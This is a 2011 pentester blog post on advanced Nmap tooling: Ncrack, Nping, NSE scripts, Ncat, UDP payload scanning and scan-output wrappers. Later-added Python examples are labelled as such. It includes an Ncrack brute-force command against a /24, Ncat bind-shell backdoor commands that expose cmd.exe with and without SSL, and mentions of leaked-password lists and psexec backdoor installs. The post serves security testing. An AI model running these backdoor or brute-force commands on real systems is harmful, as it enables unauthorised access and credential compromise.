Apr 27, 2011

Advanced Nmap

Ncrack

Ncrack is a command line password bruteforcer like Hydra and Medusa. Up until recently I was a stalwart Medusa user, but what brought me over (mostly) was the superior SSH library, RDP password bruting, and easy Nmap-like syntax. Should you want to audit a whole class C for SSH passwords, Ncrack makes this easy:
ncrack scanme.nmap.org/24 -p 22
Ncrack supports the following protocols:
  • FTP
  • TELNET
  • SSH
  • RDP
  • HTTP(S)
  • SMB
  • POP3(S)
Compared to Medusa this seems like a lot less to offer: Medusa does SQL bruteforcers, r-service bruteforcers, VNC, VMware Authd, SNMP, etc. But in most cases I use Ncrack with Medusa as a backup, and the rest of those protocols I can mostly get through Metasploit, which is one less layer of abstraction. In some cases Ncrack can be less stable; in those cases rely on old Medusa to CYA. We recommend using password lists from SkullSecurity: Ron has made an extensive list of popular site breaches and their associated leaked passwords for pentesters to use with bruteforcing tools.

Nping

In general, Hping's utility is generating custom packets. Using Hping is far easier than implementing custom packets in a scripting language like Python. A major drawback of Hping was its lack of built-in "scanner" functionality: unless you wrote a bash wrapper or Tcl script, it was a one-target tool. Nping fixes this in stellar fashion by supporting Nmap target syntax. Although Nmap has done its best to implement the kind of scanning one would do with Hping/Nping, nothing beats having a command line tool to send custom packets. "Custom packets" is a very ambiguous term; Hping has traditionally been used to test firewalls, evade IDS, send PoC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of customization, but Nping is a welcome addition to the packet crafting toolbox.

NSE (Nmap Scripting Engine)

The Nmap Scripting Engine is a Lua framework for doing pretty much anything within Nmap, with the power of Nmap. If you think about it, it was a natural progression. Some big-time firms I know have taken vuln scanners out of the rotation in their pentests, opting for specific targeted NSE scripts. In addition, NSE offers a lot to both netpen and webpen; a plethora of scripts are webpen based. There are a modest 194 scripts in SVN, but I know that not everyone is releasing their scripts, which IMO hurts the project's awesomeness. Lame pentesters are lame. Here are some of our favourites:
  • banner - A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
  • dns-cache-snoop - Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
  • hostmap - Tries to find hostnames that resolve to the target’s IP address by querying the online database at http://www.bfk.de/bfk_dnslogger.html. Replaces Hostmap which is intermittently broken =(
  • http-brute - Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
  • http-enum - Enumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum's fingerprint database (in fact we are credited in that source). DirBuster and wfuzz are great and focus on large sets of common words for directory bruteforcing; we use http-enum for more targeted framework bruteforcing… and it works.
  • smb-enum-shares - Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names is checked.
  • smb-brute - Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
  • smb-check-vulns - Checks for vulnerabilities: MS08-067, etc, etc.
  • smb-psexec - This script implements remote process execution similar to the Sysinternals psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of systems, or even installing a backdoor on a collection of computers.
  • As well as the more targeted SNMP, MSSQL,  MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.
As service-level detection becomes available for this, well, you can imagine a lot of vuln scan companies running scared. A sample run looks like this:
nmap -PN -sS -sV --script=vulscan -p25 www.target.com

25/tcp open  smtp    syn-ack Exim smtpd 4.69
| vulscan: [5330] Exim Configuration File Variable Overflow
| [5896] Exim sender_verify Function Remote Overflow
| [5897] Exim header_syntax Function Remote Overflow
| [5930] Exim Parenthesis File Name Filter Bypass
| [12726] Exim -be Command Line Option host_aton Function Local Overflow
| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
Also, Nmap NSE and Metasploit have bridged a bit through new functions implemented in Metasploit; check that out. Ron also has an experimental pwdump-like Nmap script that will dump password hashes and send them to your rainbow tables… effing eh…
So, NSE… get on it. Here are some links to get you hyped:
PS – I like to search for cool non-trunk scripts like this in Google: "nse script nmap -nmap.org" and, on the left, sort results by the last 6 months (I do this for a lot of hacking tools actually).

Ncat

Ncat is Nmap's answer to Netcat. It pretty much does everything Netcat can do, plus it implements IPv6, UDP, and SSL socket connections... no more stunnel! It also has hex output options, SOCKS4 and HTTP proxying, and built-in access control. Irongeek has a video basically showing all the flag actions in practice; you can find that here. Ncat also comes with a nifty exec feature; here we are SSL-wrapping our backdoor:

Backdoor ncat:
C:\Windows\System32> ncat -l --exec "cmd.exe" 1337
root@bt:~# ncat 1337
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 Volume in drive C has no label.
 Volume Serial Number is 00E1-F423

 Directory of c:\Windows\System32

04/15/2011  03:20 AM              .
04/15/2011  03:20 AM              ..
07/13/2009  10:37 PM              0409
09/27/2010  10:33 AM              1033
Traffic inspection of the backdoor before SSL: [screenshot]

SSL backdoor:
C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337
root@bt:~# ncat --ssl 1337
Traffic inspection of the "dir" command using the backdoor after SSL: [screenshot]

Nmap UDP Payload Scanning

The issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP payload to a service usually results in a dropped packet, which is bad news for pentesters, as we want a full and accurate scan of our targets. UDP payload scanning is the solution (most of the time): instead of scanning with an empty UDP packet, we send a legitimate payload that the service being scanned understands. If we receive a response, it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace, Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap-type features we want in a port scanner.
Newer versions of Nmap fix that dilemma by adding the following UDP probe payloads for scanning:
udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda
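To see why an empty datagram gives an ambiguous answer while a service-appropriate payload does not, here is an added example (mine, not code from the original post or from Nmap) that probes a constructed loopback UDP service which, like many real daemons, answers only well-formed DNS queries and drops everything else. The mock service, the function names and the open/closed/open|filtered classification are my own assumptions; the payload is a plain DNS TXT query of the kind Nmap sends to udp/53.

```python
import socket, struct, threading

def dns_query(name="version.bind", qtype=16, qclass=3, txid=0x4E4D):
    """Well-formed DNS query (TXT version.bind, class CH): a legitimate payload for udp/53."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # id, RD set, QDCOUNT=1
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, qclass)

def probe_udp(host, port, payload, timeout=1.0):
    """Classify like a scanner: reply -> open, ICMP unreachable -> closed, silence -> open|filtered."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))  # connected socket so ICMP port unreachable surfaces as an error
        s.send(payload)
        s.recv(4096)
        return "open"
    except socket.timeout:
        return "open|filtered"
    except ConnectionRefusedError:
        return "closed"
    finally:
        s.close()

def _mock_dns_service(sock, stop):
    """Constructed stand-in for a real service: answers valid queries, drops everything else."""
    sock.settimeout(0.1)
    while not stop.is_set():
        try:
            data, peer = sock.recvfrom(512)
        except socket.timeout:
            continue
        if len(data) >= 12 and not data[2] & 0x80:  # full header and QR bit says 'query'
            sock.sendto(data[:2] + b"\x81\x80" + data[4:6] + b"\x00" * 6 + data[12:], peer)

def compare_probes():
    """Probe one loopback port with an empty datagram and with a real DNS query."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    port = srv.getsockname()[1]
    stop = threading.Event()
    worker = threading.Thread(target=_mock_dns_service, args=(srv, stop), daemon=True)
    worker.start()
    try:
        return {"empty": probe_udp("127.0.0.1", port, b"", 0.5),
                "dns_payload": probe_udp("127.0.0.1", port, dns_query(), 0.5)}
    finally:
        stop.set()
        worker.join()
        srv.close()
```

The empty probe comes back open|filtered (the service simply ignored it) while the DNS payload gets a reply and the port is reported open; the same logic applied to your own exposed UDP services shows which of them a plain empty-packet scan would miss.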

Auxiliary Nmap Scripts

There are several scripts for manipulating output and extending Nmap.
  • fastNmap and npwn – Perl scripts for scanning large networks faster by cutting your scans into small tasks, and for analysing large scan data sets in better fashion. I'm excited to use this on a cloud provider soon for some fast and furious /16 script scanning. Research project presentations (PDFs) here and here; fastnmap and npwn code here.
  • Smap – Recently an interesting one I have played with is smap, an nmap wrapper that will take nmap output and run hosts through Nagios service checks as well. The author claims the checks are more accurate than Nmap's. Either way, I tested the wrapper against some local lab machines and it identified more HTTP servers and versions on non-standard ports than Nmap did, and more accurately. Smap discussion here and download here. Sample output:
    root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
    Scan_results generated for 2011-04-26_16.15.29
    --[ HOST - List ]--------
    IP                        :: Port   :: Service              -> Server_Type
    --------------------------::--------::----------------------->-----------------------------------------------------------
                              :: 10243  :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). Ignored State: closed (12325)
                              :: 8834   :: http                 -> NessusWWW
                              :: 5357   :: http                 -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
                              :: 3389   :: microsoft-rdp        -> Microsoft Terminal Service.
                              :: 3306   :: mysql                -> MySQL (unauthorized).
                              :: 2869   :: icslap?              -> .
                              :: 1241   :: ssl.nessus           -> Nessus Daemon (NTP v1.2).
                              :: 1036   :: nsstp?               -> .
                              :: 1035   :: multidropper?        -> .
                              :: 1027   :: msrpc                -> Microsoft Windows RPC.
                              :: 1026   :: LSA-or-nterm?        -> .
                              :: 1025   :: msrpc                -> Microsoft Windows RPC.
                              :: 990    :: ftps?                -> .
                              :: 912    :: vmware-auth          -> VMware Authentication Daemon 1.0 (Uses VNC
                              :: 554    :: rtsp?                -> .
                              :: 445    :: netbios-ssn          -> .
                              :: 443    :: ssl.http             -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.v5.10.1).
                              :: 139    :: netbios-ssn          -> .
                              :: 135    :: msrpc                -> Microsoft Windows RPC.
                              :: 80     :: http                 -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl.
  • Rainmap – Rainmap was a Summer of Code project to distribute nmap scanning among cloud servers and consolidate command and control through a single web GUI. The project was completed but is slated for a rewrite this SoC. To me it looks like it has too many moving parts and needs some more development, but it is out there.
  • Nmap to SQL – Nmap lacks SQL output for some reason. A buddy of mine asked Fyodor why it's not there by default and Fyodor told him to go read the Nmap book. He instead wrote his own, with more output than most of the comparable ones out there. Here.
  • Nsploit – an XMLRPC bridge from nmap to Metasploit (yes, we know Armitage is cool; we prefer non-GUI apps). Learn more here.
  • Droidmap – nmap for Android, still in development. Here.
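As an added illustration of the Nmap-to-SQL idea (my own example, not the tool linked above or anything from Nmap itself): load Nmap's -oX output into SQLite with bound parameters, so that a banner string from a scanned host can never become part of the SQL text, and then query the resulting inventory. The sample XML is constructed, and open_db, load_nmap_xml and hosts_running are names I chose for this example.

```python
import sqlite3, xml.etree.ElementTree as ET

# Constructed sample of Nmap -oX output, trimmed to the elements the loader reads.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/29">
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="5.3p1"/></port>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.17"/></port>
    <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
  </ports></host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server" product="Microsoft Terminal Service"/></port>
  </ports></host>
</nmaprun>"""

SCHEMA = """CREATE TABLE IF NOT EXISTS hosts(id INTEGER PRIMARY KEY, addr TEXT UNIQUE, state TEXT);
CREATE TABLE IF NOT EXISTS ports(host_id INTEGER REFERENCES hosts(id), proto TEXT, port INTEGER, state TEXT,
  service TEXT, product TEXT, version TEXT, PRIMARY KEY(host_id, proto, port));"""

def open_db(path=":memory:"):
    return sqlite3.connect(path)

def load_nmap_xml(xml_text, conn):
    """Upsert every host/port from Nmap XML into conn; returns (hosts, ports) seen.
    All scan data is bound as parameters, so a hostile banner never becomes SQL text."""
    conn.executescript(SCHEMA)
    hosts = ports = 0
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        conn.execute("INSERT OR IGNORE INTO hosts(addr, state) VALUES (?, ?)",
                     (addr.get("addr"), host.find("status").get("state")))
        host_id = conn.execute("SELECT id FROM hosts WHERE addr = ?", (addr.get("addr"),)).fetchone()[0]
        hosts += 1
        for port in host.iter("port"):
            svc = port.find("service")
            attr = (lambda k: svc.get(k) if svc is not None else None)
            conn.execute("INSERT OR REPLACE INTO ports VALUES (?, ?, ?, ?, ?, ?, ?)",
                         (host_id, port.get("protocol"), int(port.get("portid")),
                          port.find("state").get("state"), attr("name"), attr("product"), attr("version")))
            ports += 1
    conn.commit()
    return hosts, ports

def hosts_running(conn, product_prefix):
    """Inventory query: (addr, port, product, version) for open ports whose product starts with the prefix."""
    return conn.execute("SELECT h.addr, p.port, p.product, p.version FROM ports p JOIN hosts h ON h.id = p.host_id"
                        " WHERE p.state = 'open' AND p.product LIKE ? || '%' ORDER BY h.addr, p.port",
                        (product_prefix,)).fetchall()
```

Reloading the same scan is idempotent because hosts are keyed by address and ports by (host, protocol, port), so a rescan updates rows in place rather than duplicating them.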
